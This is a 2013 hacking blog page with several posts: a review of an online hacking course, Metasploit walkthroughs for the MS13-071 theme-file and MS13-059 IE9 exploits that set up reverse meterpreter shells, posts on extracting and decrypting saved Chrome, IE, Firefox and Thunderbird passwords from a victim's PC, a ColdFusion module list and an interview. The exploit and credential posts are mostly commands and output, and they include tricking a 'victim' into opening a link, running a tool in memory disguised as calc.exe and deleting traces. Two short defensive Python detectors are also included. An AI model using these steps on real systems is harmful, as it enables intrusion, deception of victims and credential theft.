Saturday, September 28, 2013

Learn How To Hack With HackingSchool Training


Probably most of you have heard about the Udemy e-learning platform. Recently I had the pleasure of taking a look at the Hacking School Training, an introductory course for anyone interested in learning about ethical hacking and system security. The author does a great job of covering a wide variety of topics; some of them need improvement, but overall it's a great course.

Course Content

According to the information on the product page, there are 11 hours of content in 46 lectures containing 19 videos. A brief look at the topics is enough to say that 11 hours is only the time needed to get through the materials: you will absolutely have to do the exercises presented in the videos on your own to consolidate the knowledge.

I wouldn't expect anyone without at least basic knowledge of Linux, networks and programming to take this course, but that basic knowledge supplemented with this course will help you understand the principles of computer security and give you solid foundations for becoming an expert. The course covers a broad range of topics. Even if you already have some practice, e.g. in exploiting website vulnerabilities, you'll be surprised by the new topics you explore.

Linux Distro 

For less experienced readers the most important part will be the attacks that every IT security specialist should know. The training comes with a Training Operating System, a LiveCD Linux distro armed with the special tools needed for the exercises. It is a great convenience to be equipped from the start with everything you need to go through the course: simply install the system on a virtual machine and start practicing.

Additionally, almost all examples are presented in the videos. You are guided step by step through performing an attack, beginning with fingerprinting and researching the target, through source code compilation (if needed), exploit preparation and tool installation, and ending with the attack itself.

What's important is that the mechanisms being exploited are explained every time. If you don't yet know how networks, memory or processor registers work, you will definitely find that information in the explanations of the prepared attacks. You'll also find some curiosities, like the history of the internet. Luckily the course doesn't focus only on easy topics like password cracking; it brings up buffer and heap overflow attacks, web server attacks and exploiting system kernel vulnerabilities.

All of this is supported with proofs of concept. You are not only taught how to use the exploits, but also how to write them on your own. Finally, there is a part devoted to securing the system step by step, improving security by installing patches or by using intrusion detection systems.

So far this course has been taken by almost 500 users. There is also another course from Hacking School available on Udemy, Website Hacking in Practice, which focuses strictly on website attacks.

Summary

Personally, I feel that the course is really good considering its price, and I would recommend it to anyone who would like to get started; the best part is that it is a hands-on course. However, there are some areas for improvement: topics like buffer and heap overflows should have been covered in much more detail. Also, I really liked the last part, where the author explains certain insecurities in web servers and how you should harden them.

 

30% Discount Coupon

For RHA readers, Andrew was kind enough to offer a 30% discount coupon to anyone who takes this course. Here's the coupon code: rafaysfriend

To learn more about the course curriculum and everything else, click here.

P.S. If you click on a link presented above, the coupon code should automatically be applied.

Hack a local network PC using a Windows theme file.

This module exploits a vulnerability mainly affecting Microsoft
Windows XP and Windows 2003. The vulnerability exists in the
handling of the Screen Saver path, in the [boot] section. An
arbitrary path can be used as screen saver, including a remote SMB
resource, which allows for remote code execution when a malicious
.theme file is opened, and the "Screen Saver" tab is viewed. The
code execution is also triggered if the victim installs the
malicious theme and stays away from the computer, when Windows tries
to display the screensaver.

Available targets:
  Id  Name
  --  ----
  0   Windows XP SP3 / Windows 2003 SP2


msf > use exploit/windows/fileformat/ms13_071_theme
msf exploit(ms13_071_theme) > set srvhost 192.168.56.1
srvhost => 192.168.56.1
msf exploit(ms13_071_theme) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms13_071_theme) > set lhost 192.168.56.1
lhost => 192.168.56.1
msf exploit(ms13_071_theme) > run
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.56.1:4444
msf exploit(ms13_071_theme) > [*] Generating our malicious executable...
[*] Creating 'msf.theme' file ...
[+] msf.theme stored at /root/.msf4/local/msf.theme
[+] Let your victim open msf.theme
[*] Ready to deliver your payload on \\192.168.56.1\qggdxi\vleGT.scr
[*] Server started.



Then send the generated theme file to the victim using the \\192.168.56.1\qggdxi\vleGT.scr link; he should open it via SMB, so tell him to put this link into Run.


As soon as he opens the file you will get a session.
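Defenders can spot the file this module produces before anyone opens it: the module description above says the screen saver path in the [boot] section is pointed at a remote SMB resource. The following added example (not part of the original post or of the Metasploit module) parses .theme files as INI data and flags a SCRNSAVE.EXE value that is a UNC path or a local .scr outside the Windows directory; both sample theme files are constructed and the "unexpected" heuristic is an assumption for the example.

```python
import configparser
import re
from typing import Optional

# Constructed sample .theme contents (not captured from a real attack).
BENIGN_THEME = """[Theme]
DisplayName=Plain

[boot]
SCRNSAVE.EXE=%SystemRoot%\\system32\\Bubbles.scr
"""

SUSPICIOUS_THEME = """[Theme]
DisplayName=Free Wallpaper Pack

[boot]
SCRNSAVE.EXE=\\\\192.0.2.10\\share\\wallpaper.scr
"""

# \\host\share\... : a screen saver that would be fetched over SMB.
UNC_RE = re.compile(r"^\\\\[^\\]+\\")


def screen_saver_path(theme_text: str) -> Optional[str]:
    """Return the SCRNSAVE.EXE value from the [boot] section, or None."""
    # .theme files are INI-style; interpolation is off so '%SystemRoot%' is kept verbatim.
    parser = configparser.ConfigParser(interpolation=None, strict=False)
    parser.read_string(theme_text)
    if not parser.has_section("boot"):
        return None
    for key, value in parser.items("boot"):  # keys are lower-cased by configparser
        if key == "scrnsave.exe":
            return value.strip().strip('"')
    return None


def classify_theme(theme_text: str) -> str:
    """'clean', 'remote' (UNC screen saver) or 'unexpected' (local .scr outside Windows dir)."""
    path = screen_saver_path(theme_text)
    if path is None:
        return "clean"       # no screen saver configured by the theme
    if UNC_RE.match(path):
        return "remote"      # the MS13-071 pattern: screen saver loaded from an SMB share
    low = path.lower()
    # Heuristic (assumption): stock themes keep the .scr under the Windows directory.
    if low.startswith("%systemroot%\\") or low.startswith("c:\\windows\\"):
        return "clean"
    return "unexpected"      # local .scr somewhere else: review manually


if __name__ == "__main__":
    for name, text in (("benign", BENIGN_THEME), ("suspicious", SUSPICIOUS_THEME)):
        print(name, "->", classify_theme(text), screen_saver_path(text))
```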



Wednesday, September 18, 2013

Extract & decrypt Chrome & IE passwords from Remote PC

In the previous post I showed how we can extract saved passwords for Firefox & Thunderbird from a remote PC. Today we are going to extract saved passwords from Google Chrome & IE. If you want more technical detail, you can visit this site.

Chrome stores all sign-on secrets in an internal database file called 'Web Data' in the current user's profile folder; newer versions have moved the login-password database into a new file named 'Login Data'. Because DPAPI encrypts the data based on either the DPAPI_SYSTEM values stored in the LSA secrets or the user's password, you can't copy the database file to another machine and decrypt it without special tools, as we did in the case of Mozilla.


First download the tool ChromePasswordDecryptor from here.

Install it on Windows. We are only interested in the Windows binary, which is located in C:\Program Files\SecurityXploded. From that directory, copy the binary ChromePasswordDecryptor.exe to our main OS (Backtrack).

We are going to use two methods to extract saved passwords from the browser.

(A) In this method we upload our binary to the victim PC using the meterpreter shell and then execute it.

(1) Get a meterpreter shell.

(2) Upload ChromePasswordDecryptor.exe (which we copied from Windows into Backtrack) to the victim.

(3) Execute it from the shell using the following command.
    ChromePasswordDecryptor.exe "pwd.txt"

(4) Download pwd.txt
    download pwd.txt /root

(5) Remove pwd.txt from the victim and also remove the uploaded binary.

    rm ChromePasswordDecryptor.exe
    rm pwd.txt



(B) In this method we execute the binary in memory, so we do not have to upload it to the victim, but we need SYSTEM privileges for this method.

(1) Get a meterpreter shell.

(2) Get SYSTEM privileges.

(3) Change directory to C:\Windows\System32

(4) Execute it in memory using the following command
execute -H -m -d calc.exe -f ChromePasswordDecryptor.exe -a "pwds.txt"

(5) Download pwds.txt
    download pwds.txt /root

(6) Remove pwds.txt from the victim
    rm pwds.txt

You can also use the same method for IE. Download the file from here.

Tuesday, September 17, 2013

Extract & decrypt passwords from Firefox & Thunderbird.

Today we are going to extract the passwords that Firefox & Thunderbird save in the browser, and then try to decrypt those passwords from a remote PC. Some time ago I posted here how to extract information from the saved SQLite databases of Skype, Firefox and Chrome using a Python script.

Most modern browsers save information in SQLite format. When a user enters login information, Firefox asks whether to remember the password. If the user clicks on "remember password", the password is saved in the Firefox database signons.sqlite, but the passwords are encrypted, so just downloading signons.sqlite is not enough to extract them. signons.sqlite is useless without the key3.db file, which also resides in the profile folder of the application. Passwords in the signons.sqlite file are encrypted with TripleDES in CBC mode; the key used for the encryption is saved in key3.db and is encrypted as well.

Firefox database path in Windows:

[Windows XP]
C:\Documents and Settings\<user_name>\Application Data\Mozilla\Firefox\<random_name>.default

[Windows Vista & Windows 7]
C:\Users\<user_name>\AppData\Roaming\Mozilla\Firefox\<random_name>.default

Firefox database path in Linux:
/root/.Mozilla/Firefox/Profile/<random_name>.default

First we have to get a meterpreter shell using any known vulnerability or any Metasploit method.


Then we have to download three files from the remote PC: key3.db, signons.sqlite and cert8.db. You can use the Metasploit post module (use post/multi/gather/firefox_creds) to download these files, or download them manually by browsing the directory.



Now we have the database file as well as the encryption key in key3.db, so we have to decrypt it. I could not find any third-party software that decrypts these passwords on Linux, but I found one program that works very well on Windows. Download the software from here. (It works for both Firefox & Thunderbird.)

(1) Copy the key3.db, signons.sqlite and cert8.db files into a folder that can be browsed from Windows.


(2) Open Windows.
(3) Install that software.
(4) Open it and just specify the Firefox installation path and the folder into which we copied the downloaded files.
(5) Click on the Start Recovery button.


Firefox & Thunderbird use the same encryption technique, so you can also get Thunderbird passwords with the method above. Just download the key3.db, signons.sqlite and cert8.db files from the Thunderbird folder, whose paths are as follows:

[Windows XP]
C:\Documents and Settings\<user_name>\Application Data\Thunderbird\Profiles\<random_name>.default

[Windows Vista & Windows 7]
C:\Users\<user_name>\AppData\Roaming\Thunderbird\Profiles\<random_name>.default

What is the solution?

If you set a master password for Firefox & Thunderbird, the saved passwords cannot be decrypted without that master password.

Thursday, September 12, 2013

An Interview With A Hacker [Shahin Ramezany]

Shahin Ramezany is a computer security researcher with over 7 years of experience in computer security, where he specializes in web application penetration, reverse-engineering/exploit-development and network penetration. Over the years he has disclosed many security vulnerabilities and authored several exploits for popular web/desktop applications.

Shahin is best known for his work on the Month of Abysssec Undisclosed Bugs (with the Abysssec team), publishing reliable 0day/1day exploit code for popular software, as well as finding and reporting issues in popular web sites such as Yahoo!, Microsoft, OWNcloud, Adobe, Mozilla and so on. Shahin is also an expert Python developer and likes to automate hacking tasks via programming. His current interests are new web hacking methods, rapid code auditing techniques and security mitigation bypasses.

Nowadays we have seen bug bounty hunting at its peak, and XSS, being low-hanging fruit, is found anywhere; lots of people I have seen are just injecting random payloads into POST/GET input without knowing how XSS actually works. What do you think about them, and what, according to you, is the future of bug bounty hunting?

Well, from my point of view the idea of bug bounty is cool, but in most bounty programs payment is cheap for experts, and in most cases credit is the first motivation for those (who know what they are doing). And about those who are doing brute force (using scanners, sending random payloads and checking reflection): they can find vulnerabilities too, because big companies have a lot of developers who are not talented (in security), but bounty programs will kill these kinds of bounty hunters and vulnerabilities soon. About the future of bounty programs, I can just say that if they pay well they can expect to kill some serious 0days; otherwise it won't work as its title.

Why do you think that your courses stand out from the rest of the training and certification programs? 

Most of the courses in the field are taught by security experts (aka defenders), who have spent a lifetime fixing and patching stuff and have had only minimal hacking experience (because it's mostly illegal), but our courses are fundamentally offensive; even the theories we provide are biased towards offense and not defense.

On top of that, we have the collective experience of some of the world's most famous security researchers, and the trainings are backed by a company which has a lot of people actually doing penetrations and researching vulnerabilities.
To sum it up, it's not a sit-and-get-certified program; it's a tough thing with a lot of labs that makes you much more confident as a hacker.

Do you think certifications are really worth the knowledge/money?

From the creators' perspective, they are actually very cheap. The amount of labs that are virtually served and thoroughly prepared for these courses is tremendous. The money is not even paying for that, and we're using a considerable open source community to push the thing forward.
From the students' perspective, the material you learn in a course is directly correlated with the people who teach it.

Everybody can take a peek at OWASP Top 10, and then go ahead teaching how to use and defend them, but people who have spent years creating the Top 10 list, and have had millions of discussions on what to put where, definitely know all the roots to those.


How will you support your students?

We have staff who will read all questions and feedback, classify them and forward them to the instructors for answers. In case some questions are out of scope, the staff will do brief research and guide the student in the right direction.

But the most important step is real-life scenario-based labs, which mimic actual hacking scenarios and are not classroom labs. These boost students' confidence and have considerable details embedded in them.

How about your certification?

We are a new firm, but we are of the highest quality (check some of our sample reports), and the people we have gathered here working together are the best in their respective fields. Our certificates will soon be of very high standings. On top of that we are willing to hire most of the students that successfully pass our courses!

What are your main courses ? 


Our focus is on application security. It can be divided into web application security, which is much more unpredictable and vast, and binary application security. For web application security, we have our advanced web hacking (flagship) course, and our penetration testing course covers some of the aspects. For binary application security, we have reverse engineering courses focused on hacking and security, and exploit development, which is a tad bit more advanced.
If our audience requires it, we will provide defensive courses as well as more focused courses such as cryptography.

What about your prices?

Because this is our initial run, our prices are not too high. Our plans are to double them by the next run. To make the courses more affordable to students, we are providing discounts for early registrations. The prices are carefully prepared, for example a price of one thousand dollars for a course with more than 1000 pages of lectures, many hours of video and more than 20 full labs available on separate machines for each student, is pretty economical.

What is your material delivery? 

We are proud to say that we have prepared our material delivery for every taste! We have a survey as part of the registration that asks students to rank their experiences. Currently we support live classes (instructors teaching directly), online classes (video and lectures recorded and playable online), and downloadable classes (download watermarked lectures and videos per student), and we can provide a mixture of them.


Our labs are primarily online on a cloud and each student has his/her own separate system to meddle with, and reset to factory setting if necessary.

Last but not least, What do you think about RHA? 

About RHA, I think you have great resources for beginners, and you can think about some expert sections in the future.

To see a complete list of trainings by the Zdresearch team, please visit the following URL:

http://training.zdresearch.com

Wednesday, September 11, 2013

Pentesting of ColdFusion web applications.

ColdFusion is a commercial rapid web application development platform.
CFML = ColdFusion Markup Language

ColdFusion = Adobe’s product that handles CFML page/libs
– Runs on Windows, Solaris, HP/UX and Linux
– Apache, IIS, Jrun
  
The following modules are available in Metasploit for ColdFusion.

msf > search coldfusion

auxiliary/gather/coldfusion_pwd_props
auxiliary/scanner/coldfusion_rds_check
auxiliary/scanner/http/cold_fusion_version
auxiliary/scanner/http/coldfusion_locale_traversal
exploit/windows/http/coldfusion_fckeditor


The following documents are available for pentesting ColdFusion web applications:

ColdFusion for Penetration Testers


ColdFusion Web Shell

If you have a good document on pentesting ColdFusion web applications, please let me know and we will add it.
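On the defensive side, the two weaknesses behind the coldfusion_locale_traversal and coldfusion_fckeditor modules listed above leave recognisable traces in web server logs. The following added example (not from the original post or from Metasploit) scans Apache-style access log lines for a traversal sequence in the administrator's locale parameter, for hits on the FCKeditor upload connector, and for administrator console access from outside an allow list; the log lines, the ADMIN_ALLOW set and the exact URL patterns are constructed assumptions for the example.

```python
import re
from typing import Dict, List
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed Apache-style access log lines (not real traffic).
SAMPLE_LOG = """\
203.0.113.5 - - [11/Sep/2013:10:01:02 +0000] "GET /index.cfm HTTP/1.1" 200 5120
203.0.113.7 - - [11/Sep/2013:10:02:15 +0000] "GET /CFIDE/administrator/enter.cfm?locale=..%2F..%2F..%2F..%2FColdFusion8%2Flib%2Fpassword.properties%00en HTTP/1.1" 200 2100
10.0.0.4 - - [11/Sep/2013:10:03:40 +0000] "GET /CFIDE/administrator/index.cfm HTTP/1.1" 200 8900
203.0.113.9 - - [11/Sep/2013:10:04:01 +0000] "POST /CFIDE/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm/upload.cfm?Command=FileUpload&Type=File HTTP/1.1" 200 310
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Addresses allowed to reach the ColdFusion administrator (assumption for the example).
ADMIN_ALLOW = {"10.0.0.4"}


def has_traversal(value: str) -> bool:
    """True if the (possibly double-encoded) value climbs directories."""
    decoded = unquote(unquote(value))
    return "../" in decoded or "..\\" in decoded


def inspect_request(ip: str, target: str) -> List[str]:
    """Return the list of findings for one request target (empty if nothing stands out)."""
    parts = urlsplit(target)
    low = unquote(parts.path).lower()
    findings = []
    if low.startswith("/cfide/administrator/"):
        if ip not in ADMIN_ALLOW:
            findings.append("administrator console reached from non-allowlisted address")
        params = parse_qs(parts.query, keep_blank_values=True)
        if any(has_traversal(v) for v in params.get("locale", [])):
            findings.append("directory traversal in 'locale' parameter (locale traversal)")
    if "/fckeditor/" in low and low.endswith("upload.cfm"):
        findings.append("FCKeditor upload connector hit (should be disabled on production)")
    return findings


def scan_log(log_text: str) -> List[Dict[str, object]]:
    """Parse each log line and keep only the requests that produced findings."""
    flagged = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # unparsable line: skipped, a real deployment would count these
        findings = inspect_request(m["ip"], m["target"])
        if findings:
            flagged.append({"ip": m["ip"], "target": m["target"], "findings": findings})
    return flagged


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit["ip"], hit["target"][:60], "->", "; ".join(hit["findings"]))
```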

Sunday, September 1, 2013

Exploit for IE 9 on Windows 7 SP1

This is a memory corruption bug found in Microsoft Internet Explorer. On IE 9 it seems to affect only certain releases of mshtml.dll; for example, this module can be used against version 9.0.8112.16446.

Target
IE 9 on Windows 7 SP1 (mshtml 9.0.8112.16446)

msf > use exploit/windows/browser/ms13_059_cflatmarkuppointer

msf exploit(ms13_059_cflatmarkuppointer) > set srvhost 192.168.56.1
srvhost => 192.168.56.1
msf exploit(ms13_059_cflatmarkuppointer) > set uripath /
uripath => /
msf exploit(ms13_059_cflatmarkuppointer) > set lhost 192.168.56.1
lhost => 192.168.56.1
msf exploit(ms13_059_cflatmarkuppointer) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms13_059_cflatmarkuppointer) > run
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.56.1:4444
msf exploit(ms13_059_cflatmarkuppointer) > [*] Using URL: http://192.168.56.1:8080/
[*] Server started.

Now send that link to the victim; as soon as he opens the link, you will get a meterpreter shell.